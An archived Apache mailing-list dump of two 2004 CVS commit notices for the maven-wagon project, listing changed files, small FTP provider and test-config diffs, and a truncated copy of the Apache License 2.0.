text
stringlengths
0
13M
From [email protected] Thu Jun 03 18:27:04 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47080 invoked from network); 3 Jun 2004 18:27:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Jun 2004 18:27:04 -0000 Received: (qmail 74073 invoked by uid 500); 3 Jun 2004 18:27:19 -0000 Delivered-To: [email protected] Received: (qmail 74041 invoked by uid 500); 3 Jun 2004 18:27:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 74023 invoked by uid 99); 3 Jun 2004 18:27:18 -0000 Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Thu, 03 Jun 2004 11:27:18 -0700 Received: (qmail 47038 invoked by uid 1668); 3 Jun 2004 18:27:01 -0000 Date: 3 Jun 2004 18:27:01 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-api license.txt .cvsignore X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/03 11:27:01 Modified: wagon-api/src/main/java/org/apache/maven/wagon/artifact/verify ArtifactVerificationException.java ArtifactVerifier.java MD5Verfier.java SHA1Verifier.java wagon-api/src/main/java/org/apache/maven/wagon/artifact Artifact.java DefaultArtifact.java wagon-api/src/main/java/org/apache/maven/wagon/authentication AuthenticationException.java AuthenticationInfo.java wagon-api/src/main/java/org/apache/maven/wagon/authorization AuthorizationException.java wagon-api/src/main/java/org/apache/maven/wagon/events SessionEvent.java SessionEventSupport.java SessionListener.java TransferEvent.java TransferEventSupport.java TransferListener.java WagonEvent.java wagon-api/src/main/java/org/apache/maven/wagon/manager DefaultWagonManager.java WagonManager.java wagon-api/src/main/java/org/apache/maven/wagon/observers ChecksumObserver.java Debug.java wagon-api/src/main/java/org/apache/maven/wagon/providers/file FileWagon.java wagon-api/src/main/java/org/apache/maven/wagon/proxy ProxyInfo.java wagon-api/src/main/java/org/apache/maven/wagon/repository Repository.java wagon-api/src/main/java/org/apache/maven/wagon AbstractWagon.java Conductor.java ConnectionException.java LazyFileOutputStream.java PathUtils.java ResourceDoesNotExistException.java StreamWagon.java TransferFailedException.java UnsupportedProtocolException.java Wagon.java WagonConstants.java WagonException.java WagonTestCase.java WagonUtils.java wagon-api/src/test/java/org/apache/maven/wagon/artifact/verify SHA1VerifierTest.java wagon-api/src/test/java/org/apache/maven/wagon/authentication AuthenticationExceptionTest.java AuthenticationInfoTest.java wagon-api/src/test/java/org/apache/maven/wagon/events MockSessionListener.java MockTransferListener.java SessionEventSupportTest.java SessionEventTest.java TransferEventSupportTest.java TransferEventTest.java wagon-api/src/test/java/org/apache/maven/wagon/manager DefaultWagonManagerTest.java WagonA.java WagonB.java WagonC.java wagon-api/src/test/java/org/apache/maven/wagon/observers ChecksumObserverTest.java wagon-api/src/test/java/org/apache/maven/wagon/providers/file FileWagonTest.java wagon-api/src/test/java/org/apache/maven/wagon/proxy ProxyInfoTest.java wagon-api/src/test/java/org/apache/maven/wagon/repository RepositoryTest.java wagon-api/src/test/java/org/apache/maven/wagon AbstractWagonTest.java CannotConnectExceptionTest.java ConductorTest.java LazyFileOutputStreamTest.java MockInputStream.java MockOutputStream.java MockWagon.java NotAuthorizedExceptionTest.java PathUtilsTest.java ResourceDoesNotExistExceptionTest.java TransferFailedExceptionTest.java wagon-api .cvsignore Added: wagon-api/src/main/java/org/apache/maven/wagon/events Debug.java wagon-api/src/main/java/org/apache/maven/wagon FileTestUtils.java wagon-api license.txt Removed: wagon-api/src/test/resources/repository maven-test-a-1.0.jar maven-test-a-1.0.jar.md5 maven-test-b-1.0.jar Log: code clean-up. more tests were added Revision Changes Path 1.2 +17 -0 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/artifact/verify/ArtifactVerificationException.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/artifact/verify/ArtifactVerificationException.java.diff?r1=1.1&r2=1.2 1.2 +18 -1 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/artifact/verify/ArtifactVerifier.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/artifact/verify/ArtifactVerifier.java.diff?r1=1.1&r2=1.2 1.3 +18 -1 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/artifact/verify/MD5Verfier.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/artifact/verify/MD5Verfier.java.diff?r1=1.2&r2=1.3 1.2 +17 -0 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/artifact/verify/SHA1Verifier.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/artifact/verify/SHA1Verifier.java.diff?r1=1.1&r2=1.2 1.2 +18 -1 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/artifact/Artifact.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/artifact/Artifact.java.diff?r1=1.1&r2=1.2 1.2 +18 -1 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/artifact/DefaultArtifact.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/artifact/DefaultArtifact.java.diff?r1=1.1&r2=1.2 1.2 +15 -14 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/authentication/AuthenticationException.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/authentication/AuthenticationException.java.diff?r1=1.1&r2=1.2 1.2 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/authentication/AuthenticationInfo.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/authentication/AuthenticationInfo.java.diff?r1=1.1&r2=1.2 1.2 +15 -14 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/authorization/AuthorizationException.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/authorization/AuthorizationException.java.diff?r1=1.1&r2=1.2 1.2 +15 -14 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/SessionEvent.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/SessionEvent.java.diff?r1=1.1&r2=1.2 1.2 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/SessionEventSupport.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/SessionEventSupport.java.diff?r1=1.1&r2=1.2 1.2 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/SessionListener.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/SessionListener.java.diff?r1=1.1&r2=1.2 1.6 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/TransferEvent.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/TransferEvent.java.diff?r1=1.5&r2=1.6 1.2 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/TransferEventSupport.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/TransferEventSupport.java.diff?r1=1.1&r2=1.2 1.2 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/TransferListener.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/TransferListener.java.diff?r1=1.1&r2=1.2 1.2 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/WagonEvent.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/WagonEvent.java.diff?r1=1.1&r2=1.2 1.3 +21 -15 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/Debug.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/events/Debug.java.diff?r1=1.2&r2=1.3 1.6 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/manager/DefaultWagonManager.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/manager/DefaultWagonManager.java.diff?r1=1.5&r2=1.6 1.5 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/manager/WagonManager.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/manager/WagonManager.java.diff?r1=1.4&r2=1.5 1.2 +32 -18 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/observers/ChecksumObserver.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/observers/ChecksumObserver.java.diff?r1=1.1&r2=1.2 1.3 +18 -17 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/observers/Debug.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/observers/Debug.java.diff?r1=1.2&r2=1.3 1.5 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/providers/file/FileWagon.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/providers/file/FileWagon.java.diff?r1=1.4&r2=1.5 1.2 +19 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/proxy/ProxyInfo.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/proxy/ProxyInfo.java.diff?r1=1.1&r2=1.2 1.3 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/repository/Repository.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/repository/Repository.java.diff?r1=1.2&r2=1.3 1.5 +40 -34 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/AbstractWagon.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/AbstractWagon.java.diff?r1=1.4&r2=1.5 1.4 +18 -1 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/Conductor.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/Conductor.java.diff?r1=1.3&r2=1.4 1.3 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/ConnectionException.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/ConnectionException.java.diff?r1=1.2&r2=1.3 1.3 +18 -1 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/LazyFileOutputStream.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/LazyFileOutputStream.java.diff?r1=1.2&r2=1.3 1.2 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/PathUtils.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/PathUtils.java.diff?r1=1.1&r2=1.2 1.2 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/ResourceDoesNotExistException.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/ResourceDoesNotExistException.java.diff?r1=1.1&r2=1.2 1.8 +23 -28 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/StreamWagon.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/StreamWagon.java.diff?r1=1.7&r2=1.8 1.2 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/TransferFailedException.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/TransferFailedException.java.diff?r1=1.1&r2=1.2 1.2 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/UnsupportedProtocolException.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/UnsupportedProtocolException.java.diff?r1=1.1&r2=1.2 1.6 +12 -11 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/Wagon.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/Wagon.java.diff?r1=1.5&r2=1.6 1.2 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonConstants.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonConstants.java.diff?r1=1.1&r2=1.2 1.2 +13 -12 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonException.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonException.java.diff?r1=1.1&r2=1.2 1.7 +50 -26 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonTestCase.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonTestCase.java.diff?r1=1.6&r2=1.7 1.3 +22 -6 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonUtils.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonUtils.java.diff?r1=1.2&r2=1.3 1.1 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/FileTestUtils.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/FileTestUtils.java?rev=1.1 1.2 +17 -0 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/artifact/verify/SHA1VerifierTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/artifact/verify/SHA1VerifierTest.java.diff?r1=1.1&r2=1.2 1.2 +15 -42 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/authentication/AuthenticationExceptionTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/authentication/AuthenticationExceptionTest.java.diff?r1=1.1&r2=1.2 1.2 +15 -42 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/authentication/AuthenticationInfoTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/authentication/AuthenticationInfoTest.java.diff?r1=1.1&r2=1.2 1.2 +18 -1 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/events/MockSessionListener.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/events/MockSessionListener.java.diff?r1=1.1&r2=1.2 1.2 +13 -53 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/events/MockTransferListener.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/events/MockTransferListener.java.diff?r1=1.1&r2=1.2 1.2 +18 -1 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/events/SessionEventSupportTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/events/SessionEventSupportTest.java.diff?r1=1.1&r2=1.2 1.3 +15 -42 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/events/SessionEventTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/events/SessionEventTest.java.diff?r1=1.2&r2=1.3 1.2 +17 -0 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/events/TransferEventSupportTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/events/TransferEventSupportTest.java.diff?r1=1.1&r2=1.2 1.3 +18 -1 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/events/TransferEventTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/events/TransferEventTest.java.diff?r1=1.2&r2=1.3 1.2 +18 -1 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/manager/DefaultWagonManagerTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/manager/DefaultWagonManagerTest.java.diff?r1=1.1&r2=1.2 1.2 +18 -1 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/manager/WagonA.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/manager/WagonA.java.diff?r1=1.1&r2=1.2 1.2 +18 -1 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/manager/WagonB.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/manager/WagonB.java.diff?r1=1.1&r2=1.2 1.2 +18 -1 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/manager/WagonC.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/manager/WagonC.java.diff?r1=1.1&r2=1.2 1.2 +65 -28 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/observers/ChecksumObserverTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/observers/ChecksumObserverTest.java.diff?r1=1.1&r2=1.2 1.3 +21 -14 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/providers/file/FileWagonTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/providers/file/FileWagonTest.java.diff?r1=1.2&r2=1.3 1.2 +15 -42 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/proxy/ProxyInfoTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/proxy/ProxyInfoTest.java.diff?r1=1.1&r2=1.2 1.2 +15 -42 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/repository/RepositoryTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/repository/RepositoryTest.java.diff?r1=1.1&r2=1.2 1.4 +18 -1 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/AbstractWagonTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/AbstractWagonTest.java.diff?r1=1.3&r2=1.4 1.2 +15 -42 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/CannotConnectExceptionTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/CannotConnectExceptionTest.java.diff?r1=1.1&r2=1.2 1.2 +18 -1 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/ConductorTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/ConductorTest.java.diff?r1=1.1&r2=1.2 1.2 +30 -13 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/LazyFileOutputStreamTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/LazyFileOutputStreamTest.java.diff?r1=1.1&r2=1.2 1.2 +15 -42 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/MockInputStream.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/MockInputStream.java.diff?r1=1.1&r2=1.2 1.2 +15 -42 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/MockOutputStream.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/MockOutputStream.java.diff?r1=1.1&r2=1.2 1.4 +18 -1 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/MockWagon.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/MockWagon.java.diff?r1=1.3&r2=1.4 1.2 +15 -42 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/NotAuthorizedExceptionTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/NotAuthorizedExceptionTest.java.diff?r1=1.1&r2=1.2 1.2 +15 -42 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/PathUtilsTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/PathUtilsTest.java.diff?r1=1.1&r2=1.2 1.2 +15 -42 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/ResourceDoesNotExistExceptionTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/ResourceDoesNotExistExceptionTest.java.diff?r1=1.1&r2=1.2 1.2 +15 -42 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/TransferFailedExceptionTest.java http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/TransferFailedExceptionTest.java.diff?r1=1.1&r2=1.2 1.2 +1 -0 maven-wagon/wagon-api/.cvsignore http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/.cvsignore.diff?r1=1.1&r2=1.2 1.1 maven-wagon/wagon-api/license.txt http://cvs.apache.org/viewcvs/maven-wagon/wagon-api/license.txt?rev=1.1 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jun 03 18:31:30 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51830 invoked from network); 3 Jun 2004 18:31:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Jun 2004 18:31:30 -0000 Received: (qmail 85623 invoked by uid 500); 3 Jun 2004 18:31:45 -0000 Delivered-To: [email protected] Received: (qmail 85595 invoked by uid 500); 3 Jun 2004 18:31:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 85494 invoked by uid 99); 3 Jun 2004 18:31:43 -0000 Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Thu, 03 Jun 2004 11:31:43 -0700 Received: (qmail 51717 invoked by uid 1668); 3 Jun 2004 18:31:26 -0000 Date: 3 Jun 2004 18:31:26 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-providers/ssh license.txt X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/03 11:31:26 Modified: wagon-providers/ftp/src/main/java/org/apache/maven/wagon/providers/ftp FtpWagon.java wagon-providers/ftp/src/test/java/org/apache/maven/wagon/providers/ftp FtpWagonTest.xml wagon-providers/http/src/main/java/org/apache/maven/wagon/providers/http HttpWagon.java wagon-providers/http/src/test/java/org/apache/maven/wagon/providers/http HttpWagonTest.java wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh ScpWagon.java Added: wagon-providers/ftp license.txt wagon-providers/http/src/main/java/org/apache/maven/wagon/providers/http PutInputStream.java wagon-providers/http license.txt wagon-providers/ssh license.txt Log: code clean-up. more tests were added Revision Changes Path 1.6 +14 -2 maven-wagon/wagon-providers/ftp/src/main/java/org/apache/maven/wagon/providers/ftp/FtpWagon.java Index: FtpWagon.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-providers/ftp/src/main/java/org/apache/maven/wagon/providers/ftp/FtpWagon.java,v retrieving revision 1.5 retrieving revision 1.6 diff -u -r1.5 -r1.6 --- FtpWagon.java 26 May 2004 16:47:19 -0000 1.5 +++ FtpWagon.java 3 Jun 2004 18:31:25 -0000 1.6 @@ -124,9 +124,10 @@ // Set to binary mode. ftp.setFileType( FTP.BINARY_FILE_TYPE ); + + // Use passive mode as default because most of us are // behind firewalls these days. - ftp.enterLocalPassiveMode(); boolean dirChanged = ftp.changeWorkingDirectory( getRepository().getBasedir() ); @@ -196,9 +197,20 @@ ftp.changeWorkingDirectory( ".." ); } + os = ftp.storeFileStream( resource ); - + if ( os == null) + { + + System.out.println( "REPLY STRING: " + ftp.getReplyString() ); + + System.out.println( "REPLY: " + ftp.getReply() ); + + System.out.println( "REPLY CODE: " + ftp.getReplyCode() ); + + } + fireTransferDebug( "resource = " + resource ); 1.4 +3 -3 maven-wagon/wagon-providers/ftp/src/test/java/org/apache/maven/wagon/providers/ftp/FtpWagonTest.xml Index: FtpWagonTest.xml =================================================================== RCS file: /home/cvs/maven-wagon/wagon-providers/ftp/src/test/java/org/apache/maven/wagon/providers/ftp/FtpWagonTest.xml,v retrieving revision 1.3 retrieving revision 1.4 diff -u -r1.3 -r1.4 --- FtpWagonTest.xml 28 Apr 2004 17:37:43 -0000 1.3 +++ FtpWagonTest.xml 3 Jun 2004 18:31:25 -0000 1.4 @@ -78,14 +78,14 @@ <role>org.apache.ftpserver.usermanager.UserManagerInterface</role> <implementation>org.apache.ftpserver.usermanager.PropertiesUserManager</implementation> <configuration> - <base-directory>${plexus.home}</base-directory> + <base-directory>${basedir}/target/test-output/</base-directory> </configuration> </component> <component> <role>org.apache.ftpserver.ip.IpRestrictorInterface</role> <implementation>org.apache.ftpserver.ip.FileIpRestrictor</implementation> <configuration> - <base-directory>${basedir}/target/local-repository</base-directory> + <base-directory>${basedir}/target/test-output/local-repository</base-directory> </configuration> </component> <component> @@ -112,7 +112,7 @@ <self-host>localhost</self-host> <remote-admin-allowed>false</remote-admin-allowed> <ftp-port>10023</ftp-port> - <default-user-root>${basedir}/target/local-repository</default-user-root> + <default-user-root>${basedir}/target/test-output/local-repository</default-user-root> </configuration> </component> </components> 1.1 maven-wagon/wagon-providers/ftp/license.txt Index: license.txt =================================================================== Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE 